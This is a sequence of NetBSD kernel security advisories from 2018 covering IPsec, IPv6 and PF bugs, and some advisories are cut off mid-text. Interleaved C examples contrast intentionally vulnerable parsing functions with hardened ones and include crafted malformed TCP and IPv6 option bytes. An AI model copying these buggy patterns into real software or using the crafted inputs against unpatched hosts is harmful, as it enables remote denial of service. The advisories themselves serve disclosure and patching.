		NetBSD 7.1 - 7.1.2:	affected
		NetBSD 7.0 - 7.0.2:	affected
		NetBSD 6.1 - 6.1.5:	affected
		NetBSD 6.0 - 6.0.6:	affected

Severity:	Remote DoS, Remote Memory Corruption

Fixed:		NetBSD-current:		Tue, May 1st 2018
		NetBSD-7-1 branch:	Thu, May 3rd 2018
		NetBSD-7-0 branch:	Thu, May 3rd 2018
		NetBSD-7 branch:	Thu, May 3rd 2018
		NetBSD-6-1 branch:	Thu, May 3rd 2018
		NetBSD-6-0 branch:	Thu, May 3rd 2018
		NetBSD-6 branch:	Thu, May 3rd 2018

Teeny versions released later than the fix date will contain the fix.

Please note that NetBSD releases prior to 6.0 are no longer supported.
It is recommended that all users upgrade to a supported release.

Abstract and Technical Details
==============================

Several bugs and vulnerabilities were discovered in the IPsec code. They
can be triggered before, or after, authentication or decryption.

Before authentication/decryption:

 1) In the AH entry point, a length check was missing, and it was possible
    for a remote attacker to crash the system by sending a very small AH
    packet. Also, a use-after-free was present in this same entry point.
 2) An inverted logic in the common IPsec entry point allowed an attacker
    to remotely crash the system when both IPsec and forwarding were
    enabled.
 3) A miscomputation in an IPsec function in charge of handling mbufs
    resulted in the wrong length being stored in the mbuf header. This
    allowed an attacker to panic the system when at least ESP was active.
 4) A sanity check in the IPsec output path was not strong enough and
    allowed an attacker to remotely panic the system when both IPsec and
    IPv6 forwarding were enabled.

After authentication/decryption:

 5) A use-after-free existed in the common Tunnel code. Also, a mistake in
    pointer initialization allowed an IPv6 packet to bypass the "local
    address spoofing" check.
 6) A missing length check in the common IPsec entry point could allow an
    attacker to crash the system.
 7) A memory leak and a use-after-free bug could allow an attacker to
    crash the system when both IPv6 and forwarding were enabled.

Solutions and Workarounds
=========================

For all NetBSD versions, you need to obtain fixed kernel sources, rebuild
and install the new kernel, and reboot the system.

The fixed source may be obtained from the NetBSD CVS repository. The
following instructions briefly summarize how to upgrade your kernel. In
these instructions, replace:

	ARCH     with your architecture (from uname -m),
	KERNCONF with the name of your kernel configuration file and
	VERSION  with the file version below

File versions containing the fixes:

FILE                              HEAD    netbsd-7    netbsd-7-0      netbsd-7-1
----                              ----    --------    ----------      ----------
src/sys/netipsec/xform_ah.c       1.80    1.42.4.2    1.42.8.2        1.42.12.2
src/sys/netipsec/ipsec.c          1.130   1.63.2.1    1.63.4.1        1.63.8.1
src/sys/netipsec/ipsec_mbuf.c     1.24    1.12.30.1   1.12.34.1       1.12.42.1
src/sys/netipsec/ipsec_output.c   1.75    1.40.4.1    1.40.8.1        1.40.12.1
src/sys/netipsec/xform_ipip.c     1.56    1.31.2.2    1.31.6.2        1.31.10.2
src/sys/netipsec/ipsec_input.c    1.58    1.32.4.1    1.32.8.1        1.32.12.1
src/sys/netinet6/ip6_forward.c    1.91    1.73.2.3    1.73.2.1.2.2    1.73.2.1.6.2

FILE                              netbsd-6    netbsd-6-0    netbsd-6-1
----                              --------    ----------    ----------
src/sys/netipsec/xform_ah.c       1.37.2.2    1.37.6.2      1.37.8.2
src/sys/netipsec/ipsec.c          1.55.8.1    1.55.12.1     1.55.14.1
src/sys/netipsec/ipsec_mbuf.c     1.12.10.1   1.12.16.1     1.12.24.1
src/sys/netipsec/ipsec_output.c   1.38.2.1    1.38.8.1      1.38.16.1
src/sys/netipsec/xform_ipip.c     1.28.8.2    1.28.14.2     1.28.22.2
src/sys/netipsec/ipsec_input.c    1.29.2.1    1.29.8.1      1.29.16.1
src/sys/netinet6/ip6_forward.c    1.69.2.2    1.69.6.2      1.69.8.2

To update from CVS, re-build, and re-install the kernel:

	# cd src
	# cvs update -d -P -r VERSION sys/netipsec/xform_ah.c
	# cvs update -d -P -r VERSION sys/netipsec/ipsec.c
	# cvs update -d -P -r VERSION sys/netipsec/ipsec_mbuf.c
	# cvs update -d -P -r VERSION sys/netipsec/ipsec_output.c
	# cvs update -d -P -r VERSION sys/netipsec/xform_ipip.c
NetBSD Security Advisory 2018-006: Several vulnerabilities in the network stack
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

		 NetBSD Security Advisory 2018-006
		 =================================

Topic:		Several vulnerabilities in the network stack

Version:	NetBSD-current:		source prior to Fri, Feb 9th 2018
		NetBSD 7.1.2:		not affected
		NetBSD 7.1 - 7.1.1:	affected
		NetBSD 7.0 - 7.0.2:	affected
		NetBSD 6.1 - 6.1.5:	affected
		NetBSD 6.0 - 6.0.6:	affected

Severity:	Remote DoS, Remote Memory Corruption

Fixed:		NetBSD-current:		Fri, Feb 9th 2018
		NetBSD-7-1 branch:	Sat, Feb 24th 2018
		NetBSD-7-0 branch:	Sat, Feb 24th 2018
		NetBSD-7 branch:	Sat, Feb 24th 2018
		NetBSD-6-1 branch:	Tue, Mar 13th 2018
		NetBSD-6-0 branch:	Tue, Mar 13th 2018
		NetBSD-6 branch:	Tue, Mar 13th 2018

Teeny versions released later than the fix date will contain the fix.

Please note that NetBSD releases prior to 6.0 are no longer supported.
It is recommended that all users upgrade to a supported release.

Abstract
========

Several vulnerabilities were discovered in the network stack:

 1) Several bugs in MPLS.
 2) Memory leak in IPv6-NBR.
 3) Double free in Pim6.
 4) IPv4 source-routed packets allowed by default.
 5) Signedness bug in PF.

Technical Details
=================

 1) Several possible use-after-frees existed in the MPLS code. This could
    cause the system to panic.

 2) A memory leak existed in the IPv6-NBR entry point. An attacker could
    cause the kernel to run out of memory.

 3) A double-free bug existed in the Pim6 (IPv6 multicast) entry point.
    This could cause the kernel to panic.

 4) Two sysctls wrongfully allowed IPv4 source-routed packets to be
    accepted by the kernel. Source-routed packets are known to have
    several security implications.

 5) A signedness bug existed in NetBSD's implementation of the PF
    firewall. A length check was unintentionally made unsigned, while it
    was expected to be signed. This could cause a read overflow (leading
    to a page fault) if a specially-crafted TCP-SYN packet was received
    while PF had a configuration of the type
    "pass in [...] tcp [...] modulate state".

Solutions and Workarounds
=========================

For all NetBSD versions, you need to obtain fixed kernel sources, rebuild
and install the new kernel, and reboot the system.

The fixed source may be obtained from the NetBSD CVS repository. The
following instructions briefly summarize how to upgrade your kernel. In
these instructions, replace:

	ARCH     with your architecture (from uname -m),
	KERNCONF with the name of your kernel configuration file and
	VERSION  with the file version below

File versions containing the fixes:

FILE                            HEAD    netbsd-7    netbsd-7-0       netbsd-7-1
----                            ----    --------    ----------       ----------
src/sys/net/if_mpls.c           1.33    1.16.2.1    1.16.6.1         1.16.10.1
src/sys/netmpls/mpls_ttl.c      1.9     1.4.4.1     1.4.8.1          1.4.12.1
src/sys/netinet6/nd6_nbr.c      1.145   1.100.2.3   1.100.2.2.2.1    1.100.2.2.6.1
src/sys/netinet6/ip6_mroute.c   1.120   1.107.2.1   1.107.6.1        1.107.10.1
src/sys/netinet/ip_input.c      1.366   1.319.2.1   1.319.6.1        1.319.10.1
src/sys/dist/pf/net/pf.c        1.78    1.72.2.1    1.72.6.1         1.72.10.1

FILE                            netbsd-6     netbsd-6-0    netbsd-6-1
----                            --------     ----------    ----------
src/sys/net/if_mpls.c           1.8.8.2      1.8.14.2      1.8.22.2
src/sys/netmpls/mpls_ttl.c      1.3.18.1     1.3.24.1      1.3.32.1
src/sys/netinet6/nd6_nbr.c      1.95.2.1     1.95.6.1      1.95.8.1
src/sys/netinet6/ip6_mroute.c   1.103.2.1    1.103.8.1     1.103.16.1
src/sys/netinet/ip_input.c      1.298.2.1    1.298.6.1     1.298.8.1
src/sys/dist/pf/net/pf.c        1.68.2.1     1.68.6.1      1.68.8.1

To update from CVS, re-build, and re-install the kernel:

	# cd src
	# cvs update -d -P -r VERSION sys/net/if_mpls.c
	# cvs update -d -P -r VERSION sys/netmpls/mpls_ttl.c
	# cvs update -d -P -r VERSION sys/netinet6/nd6_nbr.c
	# cvs update -d -P -r VERSION sys/netinet6/ip6_mroute.c
	# cvs update -d -P -r VERSION sys/netinet/ip_input.c
	# cvs update -d -P -r VERSION sys/dist/pf/net/pf.c
	# ./build.sh kernel=KERNCONF
	# mv /netbsd /netbsd.old
	# cp sys/arch/ARCH/compile/obj/KERNCONF/netbsd /netbsd
	# shutdown -r now

For more information on how to do this, see:

	http://www.NetBSD.org/guide/en/chap-kernel.html

Thanks To
=========

Maxime Villard for finding and fixing issues 1) 2) 3) 4), Lucio Albornoz
for reporting a problem that was discovered
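Issue 5 above is a signed check that became unsigned. The added example (written for this page, not PF's code) assumes the check sat in front of a TCP option walk, which is where a SYN's data-offset field is turned into an option-area length: a field value below 5 yields a negative length that a signed test rejects, while the unsigned version turns it into a value of nearly 4 GiB and hands that to the walker. The option walker, the constructed SYN bytes and the function names are this example's own.

```c
#include <stddef.h>
#include <stdint.h>

#define TCP_HDRLEN	20
#define TCPOPT_EOL	0
#define TCPOPT_NOP	1
#define TCPOPT_WINDOW	3
#define TCPOLEN_WINDOW	3

/*
 * Hardened: the option-area length is a signed int, so a data-offset
 * field below 5 (a header shorter than 20 bytes) comes out negative and
 * is rejected before any option byte is read. Returns the window scale
 * shift, 0 if the option is absent, -1 if the header is malformed.
 */
int
tcp_get_wscale(const uint8_t *tcp, size_t caplen)
{
	int doff, hlen;
	size_t off = TCP_HDRLEN;

	if (caplen < TCP_HDRLEN)
		return -1;
	doff = (tcp[12] >> 4) * 4;		/* header length in bytes */
	hlen = doff - TCP_HDRLEN;		/* option bytes; negative if doff < 20 */
	if (hlen < 0 || (size_t)doff > caplen)
		return -1;
	while (hlen >= TCPOLEN_WINDOW) {
		uint8_t kind = tcp[off], olen;

		if (kind == TCPOPT_EOL)
			break;
		if (kind == TCPOPT_NOP) {
			off++; hlen--;
			continue;
		}
		olen = tcp[off + 1];
		if (olen < 2 || olen > hlen)
			return -1;		/* option longer than the area */
		if (kind == TCPOPT_WINDOW && olen == TCPOLEN_WINDOW)
			return tcp[off + 2];
		off += olen; hlen -= olen;
	}
	return 0;
}

/*
 * The bug class: the same subtraction in unsigned arithmetic. For a
 * data-offset field of 2, 8 - 20 wraps to 4294967284; a test of the form
 * "hlen < 0" is always false on an unsigned value, so the wrapped length
 * reaches the option walker, which then reads far past the packet. This
 * function only reports the length the walker would have been given.
 */
unsigned int
tcp_optlen_naive(const uint8_t *tcp)
{
	unsigned int doff = (tcp[12] >> 4) * 4;
	return doff - TCP_HDRLEN;		/* wraps when doff < 20 */
}

/* Constructed SYN, 24 bytes: data offset 6, options NOP + window scale 7. */
static const uint8_t syn_ok[24] = {
	0x04, 0xd2, 0x00, 0x50, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00,
	0x60, 0x02, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00,
	TCPOPT_NOP, TCPOPT_WINDOW, TCPOLEN_WINDOW, 7
};

/* Same bytes with the data-offset field forced to 2 (an 8-byte "header"). */
static const uint8_t syn_short[24] = {
	0x04, 0xd2, 0x00, 0x50, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00,
	0x20, 0x02, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00,
	TCPOPT_NOP, TCPOPT_WINDOW, TCPOLEN_WINDOW, 7
};

int demo_wscale_ok(void)      { return tcp_get_wscale(syn_ok, sizeof(syn_ok)); }
int demo_short_hardened(void) { return tcp_get_wscale(syn_short, sizeof(syn_short)); }
unsigned int demo_short_naive(void) { return tcp_optlen_naive(syn_short); }
```

The valid SYN yields a window scale of 7; the short one is rejected by the signed check, whereas the unsigned computation produces 4294967284 option bytes to walk, the read overflow the advisory attributes to `modulate state` processing.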
NetBSD Security Advisory 2018-005: Privilege separation bug in Xen-amd64
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

		 NetBSD Security Advisory 2018-005
		 =================================

Topic:		Privilege separation bug in Xen-amd64

Version:	NetBSD-current:		source prior to Sun, Dec 31st 2017
		NetBSD 7.1.2:		not affected
		NetBSD 7.1 - 7.1.1:	affected
		NetBSD 7.0 - 7.0.2:	affected
		NetBSD 6.1 - 6.1.5:	affected
		NetBSD 6.0 - 6.0.6:	affected

Severity:	Privilege escalation / Local DoS

Fixed:		NetBSD-current:		Sun, Dec 31st 2017
		NetBSD-7-1 branch:	Mon, Jan 22nd 2018
		NetBSD-7-0 branch:	Mon, Jan 22nd 2018
		NetBSD-7 branch:	Mon, Jan 22nd 2018
		NetBSD-6-1 branch:	Mon, Feb 19th 2018
		NetBSD-6-0 branch:	Mon, Feb 19th 2018
		NetBSD-6 branch:	Mon, Feb 19th 2018

Teeny versions released later than the fix date will contain the fix.

Please note that NetBSD releases prior to 6.0 are no longer supported.
It is recommended that all users upgrade to a supported release.

Abstract
========

A mistake in the Xen-amd64 port of NetBSD allowed unprivileged users to
read from and write to the CPU's I/O ports. This could be used to escalate
privileges.

Technical Details
=================

The kernel uses several flags that define CPU protections, in particular
SEL_KPL and SEL_UPL, which respectively define "kernel" privileges and
"user" privileges in the %cs register.

64bit Xen PV guests run, by design, in ring3, the same protection level as
userland. As a result, SEL_KPL equals SEL_UPL.

Xen uses a specific iopl privilege mechanism to control access rights to
the CPU I/O ports: it expects the iopl value to match the intended
privilege, and not the hardware privilege. Therefore, if the kernel wanted
to prevent userland from accessing the CPU I/O ports, it had to set the
iopl to ring0, even if the kernel actually runs in ring3.

A mistake existed in NetBSD, where iopl was unintentionally set to ring3,
allowing userland to access CPU I/O ports. The mistake in question was a
confusion with the privilege flags: iopl was set to SEL_KPL, but in the
case of Xen-amd64 this was equal to SEL_UPL, which meant ring3.

Solutions and Workarounds
=========================

For all NetBSD versions, you need to obtain fixed kernel sources, rebuild
and install the new kernel, and reboot the system.

The fixed source may be obtained from the NetBSD CVS repository. The
following instructions briefly summarize how to upgrade your kernel. In
these instructions, replace:

	ARCH     with your architecture (from uname -m),
	KERNCONF with the name of your kernel configuration file and
	VERSION  with the file version below

File versions containing the fixes:

FILE                                     HEAD     netbsd-7     netbsd-7-0    netbsd-7-1
----                                     ----     --------     ----------    ----------
src/sys/arch/amd64/amd64/machdep.c       1.280    1.211.2.2    1.211.6.2     1.211.10.2
src/sys/arch/amd64/include/segments.h    1.34     1.24.12.1    1.24.16.1     1.24.22.1
src/sys/arch/i386/i386/machdep.c         1.800    1.752.4.2    1.752.8.2     1.752.12.2
src/sys/arch/i386/include/segments.h     1.64     1.54.30.1    1.54.34.1     1.54.38.1
src/sys/arch/x86/x86/vm_machdep.c        1.30     1.25.4.2     1.25.8.2      1.25.4.1.2.1

FILE                                     netbsd-6        netbsd-6-0         netbsd-6-1
----                                     --------        ----------         ----------
src/sys/arch/amd64/amd64/machdep.c       1.175.2.10      1.175.2.7.2.3      1.175.2.8.2.2
src/sys/arch/amd64/include/segments.h    1.22.10.1       1.22.14.1          1.22.16.1
src/sys/arch/i386/i386/machdep.c         1.717.2.9       1.717.2.7.4.2      1.717.2.7.6.2
src/sys/arch/i386/include/segments.h     1.54.10.1       1.54.16.1          1.54.24.1
src/sys/arch/x86/x86/vm_machdep.c        1.14.2.1        1.14.6.1           1.14.8.1

To update from CVS, re-build, and re-install the kernel:

	# cd src
	# cvs update -d -P -r VERSION sys/arch/amd64/amd64/machdep.c
	# cvs update -d -P -r VERSION sys/arch/amd64/include/segments.h
	# cvs update -d -P -r VERSION sys/arch/i386/i386/machdep.c
	# cvs update -d -P -r VERSION sys/arch/i386/include/segments.h
	# cvs update -d -P -r VERSION sys/arch/x86/x86/vm_machdep.c
	# ./build.sh kernel=KERNCONF
	# mv /netbsd /netbsd.old
	# cp sys/arch/ARCH/compile/obj/KERNCONF/netbsd /netbsd
	# shutdown -r now

For more information on how to do this, see:

	http://www.NetBSD.org/guide/en/chap-kernel.html

Thanks To
=========

Maxime Villard for finding and fixing the issue.

Revision History
================

	2018-04-09	Initial release

More Information
================

Advisories may be updated as new information becomes
NetBSD Security Advisory 2018-004: Remote Memory Corruption in IPv6
NetBSD Security Advisory 2018-004: Remote Memory Corruption in IPv6
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

                 NetBSD Security Advisory 2018-004
                 =================================

Topic:          Remote Memory Corruption in IPv6

Version:        NetBSD-current:         source prior to Tue, Jan 30th 2018
                NetBSD 7.1:             affected
                NetBSD 7.0 - 7.0.2:     affected
                NetBSD 6.1 - 6.1.4:     affected
                NetBSD 6.0 - 6.0.5:     affected

Severity:       Remote DoS, Remote Memory Corruption

Fixed:          NetBSD-current:         Tue, Jan 30th 2018
                NetBSD-7-1 branch:      Tue, Jan 30th 2018
                NetBSD-7-0 branch:      Tue, Jan 30th 2018
                NetBSD-7 branch:        Tue, Jan 30th 2018
                NetBSD-6-1 branch:      Tue, Jan 30th 2018
                NetBSD-6-0 branch:      Tue, Jan 30th 2018
                NetBSD-6 branch:        Tue, Jan 30th 2018

Teeny versions released later than the fix date will contain the fix.

Please note that NetBSD releases prior to 6.0 are no longer supported.
It is recommended that all users upgrade to a supported release.


Abstract
========

A mistake in the way received IPv6 packets are handled allowed an attacker
to remotely trigger a memory corruption.


Technical Details
=================

When a packet is received, the kernel stores it in memory as a chain of
mbufs. An mbuf is basically a block of contiguous memory.

A function located deep in the IPv6 input path was not performing the
necessary checks when processing a received IPv6 packet. It parsed the
IPv6 options assuming they were located in the first mbuf of the chain,
but this assumption was incorrect. It was therefore possible for this
function to return a pointer into an area located after the first mbuf.
This pointer was then either read from, or written to with one byte that
could be controlled by the packet.

It has been demonstrated that by sending a special combination of nested
IPv6 fragments, this bug could be exploited remotely, and could allow an
attacker to cause the kernel to behave unexpectedly because random areas
of memory were overwritten. It is not clear whether this attack could be
turned into a code execution attack.

The PF firewall can mitigate this particular attack, because it rejects
nested IPv6 fragments by default. NPF does not reject such fragments by
default. The status of IPF in this regard has not been investigated.
It is possible that other vectors than IPv6 fragments could trigger this
vulnerability.


Solutions and Workarounds
=========================

For all NetBSD versions, you need to obtain fixed kernel sources,
rebuild and install the new kernel, and reboot the system.

The fixed source may be obtained from the NetBSD CVS repository.
The following instructions briefly summarize how to upgrade your
kernel. In these instructions, replace:

    ARCH      with your architecture (from uname -m),
    KERNCONF  with the name of your kernel configuration file and
    VERSION   with the file version below

File versions containing the fixes:

FILE                             HEAD    netbsd-7    netbsd-7-0      netbsd-7-1
----                             ----    --------    ----------      ----------
src/sys/netinet6/frag6.c         1.65    1.55.4.1    1.55.6.1        1.55.10.1
src/sys/netinet6/ip6_input.c     1.187   1.149.2.2   1.149.2.1.2.1   1.149.2.1.6.1
src/sys/netinet6/ip6_var.h       1.78    1.62.2.2    1.62.2.1.2.1    1.62.2.1.6.1
src/sys/netinet6/raw_ip6.c       1.160   1.136.2.2   1.136.6.1       1.136.2.1.2.1

FILE                             netbsd-6    netbsd-6-0      netbsd-6-1
----                             --------    ----------      ----------
src/sys/netinet6/frag6.c         1.52.2.3    1.52.2.1.4.2    1.52.2.2.2.1
src/sys/netinet6/ip6_input.c     1.136.2.2   1.136.6.2       1.136.8.2
src/sys/netinet6/ip6_var.h       1.58.2.2    1.58.6.2        1.58.8.2
src/sys/netinet6/raw_ip6.c       1.109.2.1   1.109.6.1       1.109.8.1
src/sys/netinet6/ah_input.c      1.59.8.1    1.59.12.1       1.59.14.1
src/sys/netinet6/esp_input.c     1.50.8.1    1.50.12.1       1.50.14.1
src/sys/netinet6/ipcomp_input.c  1.38.8.1    1.38.12.1       1.38.14.1

Note: for NetBSD-6, there are three more files that contain the fix.

To update from CVS, re-build, and re-install the kernel:

    # cd src
    # cvs update -d -P -r VERSION sys/netinet6/frag6.c
    # cvs update -d -P -r VERSION sys/netinet6/ip6_input.c
    # cvs update -d -P -r VERSION sys/netinet6/ip6_var.h
    # cvs update -d -P -r VERSION sys/netinet6/raw_ip6.c

If you run NetBSD-6:

    # cvs update -d -P -r VERSION sys/netinet6/ah_input.c
    # cvs update -d -P -r VERSION sys/netinet6/esp_input.c
    # cvs update -d -P -r VERSION sys/netinet6/ipcomp_input.c

    # ./build.sh kernel=KERNCONF
    # mv /netbsd /netbsd.old
    # cp
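The first-mbuf assumption described in the Technical Details above, as an added example that is not NetBSD's code: a minimal model of an mbuf chain, a lookup that trusts the first mbuf the way the pre-fix parser did, the checked variant that refuses any range crossing the mbuf boundary, and a linearising copy in the spirit of the kernel's m_copydata() for callers that need the bytes anyway. The struct layout, function names and the two constructed 8-byte segments are this example's own; they are not sys/mbuf.h.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Minimal model of an mbuf chain: each mbuf holds one contiguous slice of the
 * packet, and the slices are linked in order. (Example structure, not sys/mbuf.h.) */
struct mbuf {
    uint8_t     *m_data;
    size_t       m_len;
    struct mbuf *m_next;
};

/* Pre-fix pattern described in the advisory: hand back a pointer computed from the
 * first mbuf without checking that [off, off+len) actually lies inside it. */
uint8_t *opt_ptr_buggy(struct mbuf *m, size_t off, size_t len)
{
    (void)len;
    return m->m_data + off;              /* may point past m->m_data + m->m_len */
}

/* Checked variant: return NULL unless the whole range sits in the first mbuf, so
 * the caller must pull the header up (m_pullup) or copy it out instead. */
uint8_t *opt_ptr_checked(struct mbuf *m, size_t off, size_t len)
{
    if (len == 0 || off > m->m_len || len > m->m_len - off)
        return NULL;
    return m->m_data + off;
}

/* Copy `len` bytes starting at logical offset `off` out of the chain into dst,
 * crossing mbuf boundaries as needed. 0 on success, -1 if the chain is too short. */
int m_copy_range(const struct mbuf *m, size_t off, size_t len, uint8_t *dst)
{
    while (m != NULL && off >= m->m_len) {   /* skip whole mbufs before off */
        off -= m->m_len;
        m = m->m_next;
    }
    while (len > 0) {
        if (m == NULL)
            return -1;
        size_t n = m->m_len - off;
        if (n > len)
            n = len;
        memcpy(dst, m->m_data + off, n);
        dst += n; len -= n; off = 0;
        m = m->m_next;
    }
    return 0;
}

/* Constructed two-mbuf chain (byte values are arbitrary): the 4-byte range the
 * parser wants starts at offset 6 and spills into the second mbuf. */
static uint8_t seg0[8] = { 0x60, 0x00, 0x00, 0x00, 0x00, 0x08, 0x3c, 0x40 };
static uint8_t seg1[8] = { 0x01, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 };
static struct mbuf m1 = { seg1, sizeof seg1, NULL };
static struct mbuf m0 = { seg0, sizeof seg0, &m1 };

/* 1 if the buggy lookup yields a pointer whose range ends outside the first mbuf. */
int buggy_points_past_first_mbuf(size_t off, size_t len)
{
    uint8_t *p = opt_ptr_buggy(&m0, off, len);
    return (size_t)(p - m0.m_data) + len > m0.m_len;
}

int checked_accepts(size_t off, size_t len)
{
    return opt_ptr_checked(&m0, off, len) != NULL;
}

int copy_across_chain(size_t off, size_t len, uint8_t *dst)
{
    return m_copy_range(&m0, off, len, dst);
}

int main(void)
{
    uint8_t opt[4];
    printf("buggy pointer escapes first mbuf: %d\n", buggy_points_past_first_mbuf(6, 4));
    printf("checked lookup accepts:           %d\n", checked_accepts(6, 4));
    if (copy_across_chain(6, 4, opt) == 0)
        printf("copied %02x %02x %02x %02x\n", opt[0], opt[1], opt[2], opt[3]);
    return 0;
}
```

The buggy lookup happily returns a pointer two bytes short of the data it promises; whatever lies after the first mbuf's buffer is what the advisory's one-byte read or write then touches. The checked lookup fails closed, and the copy routine shows the safe alternative when the header genuinely straddles mbufs.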
NetBSD Security Advisory 2018-003: Remote DoS in IPsec (IPv6)
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

                 NetBSD Security Advisory 2018-003
                 =================================

Topic:          Remote DoS in IPsec (IPv6)

Version:        NetBSD-current:         source prior to Wed, Jan 24th 2018
                NetBSD 7.1:             affected
                NetBSD 7.0 - 7.0.2:     affected
                NetBSD 6.1 - 6.1.4:     affected
                NetBSD 6.0 - 6.0.5:     affected

Severity:       Remote DoS, Remote Memory Corruption

Fixed:          NetBSD-current:         Wed, Jan 24th 2018
                NetBSD-7-1 branch:      Mon, Jan 29th 2018
                NetBSD-7-0 branch:      Mon, Jan 29th 2018
                NetBSD-7 branch:        Mon, Jan 29th 2018
                NetBSD-6-1 branch:      Mon, Jan 29th 2018
                NetBSD-6-0 branch:      Mon, Jan 29th 2018
                NetBSD-6 branch:        Mon, Jan 29th 2018

Teeny versions released later than the fix date will contain the fix.

Please note that NetBSD releases prior to 6.0 are no longer supported.
It is recommended that all users upgrade to a supported release.


Abstract
========

A mistake in the way IPsec parses IPv6-AH packets allowed an attacker to
remotely crash the kernel with a single IPv6 packet.


Technical Details
=================

When receiving an IPv6-AH packet, IPsec must zero out the IPv6 options
that are mutable. To achieve that, it must find the IPPROTO_HOPOPTS and
IPPROTO_DSTOPTS headers and iterate over the suboptions they contain.

A suboption is made of a header and a payload. The header is two bytes
long: the second byte indicates the length of the payload, and does not
count the size of the suboption header itself.

A mistake existed in the suboption iteration procedure: the parser's
loop advanced by the length of the payload, but did not also add the two
bytes of the header. Therefore, if a suboption had a 'length' field of
zero, the kernel would enter an infinite loop. By sending a single
IPv6-AH packet with a suboption of length zero, an attacker could
remotely make the kernel unresponsive.

Moreover, the suboption parser was written with the assumption that an
incoming IPv6 packet had already gone through the generic IPv6 parser,
and that several fields were therefore already guaranteed to be valid.
Because of the aforementioned bug, this assumption no longer held, and
it was possible for an attacker to remotely trigger a buffer overflow
that filled with zeros an area extending beyond the buffer containing
the packet.


Important Note
==============

Several other issues have been, and are being, identified in the IPsec
code. It is not yet clear whether they are exploitable or not, but the
fixes are being propagated to the stable branches. Therefore, while a
Security Advisory may not be available shortly, it is recommended that
users of IPsec keep their systems up-to-date.


Solutions and Workarounds
=========================

For all NetBSD versions, you need to obtain fixed kernel sources,
rebuild and install the new kernel, and reboot the system.

The fixed source may be obtained from the NetBSD CVS repository.
The following instructions briefly summarize how to upgrade your
kernel. In these instructions, replace:

    ARCH      with your architecture (from uname -m),
    KERNCONF  with the name of your kernel configuration file and
    VERSION   with the file version below

File versions containing the fixes:

FILE                          HEAD    netbsd-7    netbsd-7-0    netbsd-7-1
----                          ----    --------    ----------    ----------
src/sys/netipsec/xform_ah.c   1.76    1.42.4.1    1.42.8.1      1.42.12.1

FILE                          netbsd-6    netbsd-6-0    netbsd-6-1
----                          --------    ----------    ----------
src/sys/netipsec/xform_ah.c   1.37.2.1    1.37.6.1      1.37.8.1

To update from CVS, re-build, and re-install the kernel:

    # cd src
    # cvs update -d -P -r VERSION sys/netipsec/xform_ah.c
    # ./build.sh kernel=KERNCONF
    # mv /netbsd /netbsd.old
    # cp sys/arch/ARCH/compile/obj/KERNCONF/netbsd /netbsd
    # shutdown -r now

For more information on how to do this, see:

    http://www.NetBSD.org/guide/en/chap-kernel.html


Thanks To
=========

Maxime Villard for finding and fixing the issue.


Revision History
================

    2018-02-12  Initial release


More Information
================

Advisories may be updated as new information becomes available.

The most recent version of this advisory (PGP signed) can be found at
    http://ftp.NetBSD.org/pub/NetBSD/security/advisories/NetBSD-SA2018-0XX.txt.asc

Information about NetBSD and NetBSD security can be found at
    http://www.NetBSD.org/
    http://www.NetBSD.org/Security/


Copyright 2018, The NetBSD Foundation, Inc.  All Rights Reserved.
Redistribution permitted only in full, unmodified form.

-BEGIN PGP SIGNATURE-
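The suboption walk from the Technical Details above, as an added example that is not NetBSD's xform_ah.c: a TLV walker over a Hop-by-Hop or Destination Options area that zeroes the payload of every option whose "change en route" bit (0x20 in the option type, RFC 8200) is set, which is what AH must do before computing the ICV. A `header_bytes` parameter selects the pre-fix stride (payload length only) or the corrected one (payload length plus the two header bytes); a progress check turns the kernel's infinite loop into an error code so the example terminates, and explicit bounds checks stand in for the generic-parser validation the advisory says the AH code wrongly relied on. Function names, return codes and the constructed option bytes are this example's own.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define IP6OPT_PAD1     0x00   /* one-byte padding option: no length field */
#define IP6OPT_MUTABLE  0x20   /* "change en route" bit of the option type (RFC 8200) */

enum { OPTS_OK = 0, OPTS_TRUNCATED = -1, OPTS_STUCK = -2 };

/* Walk the options area of a Hop-by-Hop or Destination Options header and zero the
 * payload of every mutable option, as AH must before computing the ICV.
 * header_bytes is what the loop adds for the two-byte TLV header: 0 reproduces the
 * pre-fix stride from the advisory, 2 is the corrected stride. With stride 0 a
 * zero-length option never advances; the progress check below turns the kernel's
 * infinite loop into OPTS_STUCK so this example terminates. Bounds are checked
 * before every access, so a length running past the buffer gives OPTS_TRUNCATED
 * instead of zeroing memory beyond it. */
int ah_zero_mutable_opts(uint8_t *opts, size_t len, size_t header_bytes, size_t *nopts)
{
    size_t off = 0, count = 0;

    while (off < len) {
        uint8_t type = opts[off];
        if (type == IP6OPT_PAD1) {
            off++; count++;
            continue;
        }
        if (off + 2 > len)                 /* no room for type + length */
            return OPTS_TRUNCATED;
        size_t plen = opts[off + 1];
        if (plen > len - off - 2)          /* payload runs past the buffer */
            return OPTS_TRUNCATED;
        if (type & IP6OPT_MUTABLE)
            memset(opts + off + 2, 0, plen);
        size_t next = off + header_bytes + plen;
        if (next <= off)
            return OPTS_STUCK;             /* no forward progress */
        off = next;
        count++;
    }
    *nopts = count;
    return OPTS_OK;
}

/* Constructed sample: Quick-Start option (type 0x26, mutable, 6-byte payload)
 * followed by a zero-length PadN. Returns 1 if the corrected walk sees both
 * options and zeroes only the mutable payload. */
int demo_fixed_stride(void)
{
    uint8_t opts[] = { 0x26, 0x06, 1, 2, 3, 4, 5, 6, 0x01, 0x00 };
    size_t n = 0;
    int rc = ah_zero_mutable_opts(opts, sizeof opts, 2, &n);
    return rc == OPTS_OK && n == 2 && opts[0] == 0x26 && opts[1] == 0x06
        && opts[2] == 0 && opts[7] == 0 && opts[8] == 0x01;
}

/* Two zero-length PadN options walked with the pre-fix stride: OPTS_STUCK. */
int demo_buggy_stride(void)
{
    uint8_t opts[] = { 0x01, 0x00, 0x01, 0x00 };
    size_t n = 0;
    return ah_zero_mutable_opts(opts, sizeof opts, 0, &n);
}

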